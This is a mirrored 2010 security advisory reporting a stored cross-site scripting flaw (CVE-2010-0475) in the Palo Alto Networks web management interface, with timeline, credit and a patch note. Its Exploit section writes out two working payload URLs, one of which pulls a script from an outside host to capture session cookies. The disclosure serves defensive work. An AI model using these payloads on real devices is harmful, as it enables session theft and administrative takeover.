Информационная безопасность
[RU] switch to English


Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  Joomla Component advertising (com_aardvertiser
) File Inclusion Vulnerability

  Blind SQL injection vulnerability in NPDS REvolution

  XSS vulnerability in NPDS

  Secunia Research: TomatoCMS "q" SQL Injection Vulnerability

From:Jeromie Jackson <jeromie_(at)_comsecinc.com>
Date:13 мая 2010 г.
Subject:Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)

Class:          Cross-Site Scripting (XSS) Vulnerability
CVE:    CVE-2010-0475
Remote: Yes
Local:  Yes
Published: May 11, 2010 08:30AM
Timeline:Submission to MITRE: 1/18/2010
Vendor Contact: 2/18/2010
Vendor Response:  2/18/2010
Patch Available:  5/2010  Patched in maintenance releases (3.1.1 & 3.0.9)
Credit: Jeromie Jackson CISSP, CISM
       COBIT & ITIL Certified
       President- San Diego Open Web Application Security Project (OWASP)
       Vice President- San Diego Information Audit & Control Association (ISACA)
       SANS Mentor
       LinkedIn: www.linkedin.com/in/securityassessment
       Blog: www.JeromieJackson.com
       Twitter: www.twitter.com/Security_Sifu

Validated Vulnerable:   
  Latest Version Per December 31, 2009

Discussion:

A Stored Cross-Site Scripting (XSS) vulnerability was found within the Palo Alto interface.  By crafting a URL that includes XSS code it is possible to inject malicious
data, redirect the user to a bogus replica of the real website, or other nefarious activity.  


Exploit:
Single Line working-
https://10.32.5.223:443/esp/editUser.
esp?mode=edit&origusername=test&deviceC=localhost.
localdomain&vsysC=localhost.
localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tp
asswd=********&cpasswd=********&role=vsysadmin<SCRIPT>alert("
0wn3d")</SCRIPT>

&admin-role=%5Bobject+Object%5D&bSubmit=O



WORKING FOR REDIRECT TO LOAD cookies into URL.

https://10.32.5.223:443/esp/editUser.
esp?mode=edit&origusername=test&deviceC=localhost.
localdomain&vsysC=localhost.
localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tp
asswd=********&cpasswd=********&role=vsysadmin<SCRIPT/XSS
SRC="http://www.jeromiejackson.com/tryme.js"></SCRIPT>&adm
in-role=%5Bobject+Object%5D&bSubmit=O


Solution:
A patch will be required from the vendor.  It is recommended a routine to sanitize user input be consistently implemented throughout the application to mitigate other
such occurrences within the application.

References:
OWASP Cross-Site Scripting (XSS) Attack Discussion
Rsnake's Cross-Site Scripting (XSS) Attack Cheat sheet

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород